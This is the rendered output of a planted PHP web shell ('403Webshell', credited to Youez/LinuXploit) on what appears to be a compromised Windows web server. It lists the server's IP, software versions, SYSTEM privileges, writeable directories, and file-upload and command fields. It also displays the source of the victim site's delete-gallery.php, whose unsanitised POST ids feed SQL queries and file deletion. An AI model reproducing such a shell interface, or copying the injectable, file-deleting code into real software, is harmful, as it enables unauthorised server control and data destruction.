403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/move/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/news/move//delete-gallery.php
<?php
/* Database connection start */
session_start();
include("header.php");
include "db.php";
$table = "photo";
/* Database connection end */
$id = $mysqli->escape_string($_GET['idn']);
$uid = $mysqli->escape_string($_GET['uid']);
		//
$kk=$_POST["chk"];
if ($kk==""){
echo "<script>window.parent.location=\"photogallery.php?id=$id&uid=$uid\"</script>";
}		
for($i=0;$i<count($_POST["chk"]);$i++)
	{
		if($_POST["chk"][$i] != "")
		{
			$pid=$_POST["chk"][$i];			
			$SQL2 = $mysqli->query("SELECT * FROM $table WHERE id ='$pid'");
			$Row2 = mysqli_fetch_array($SQL2);
			$photoname=$Row2["photo_name"];
			unlink("myphoto/$photoname");
			
			$mysqli->query("DELETE FROM $table WHERE id='$pid'") or die (mysqli_error());

		}
		
	}
echo "<script>window.parent.location=\"photogallery.php?id=$id&uid=$uid\"</script>";	
?>

Youez - 2016 - github.com/yon3zu
LinuXploit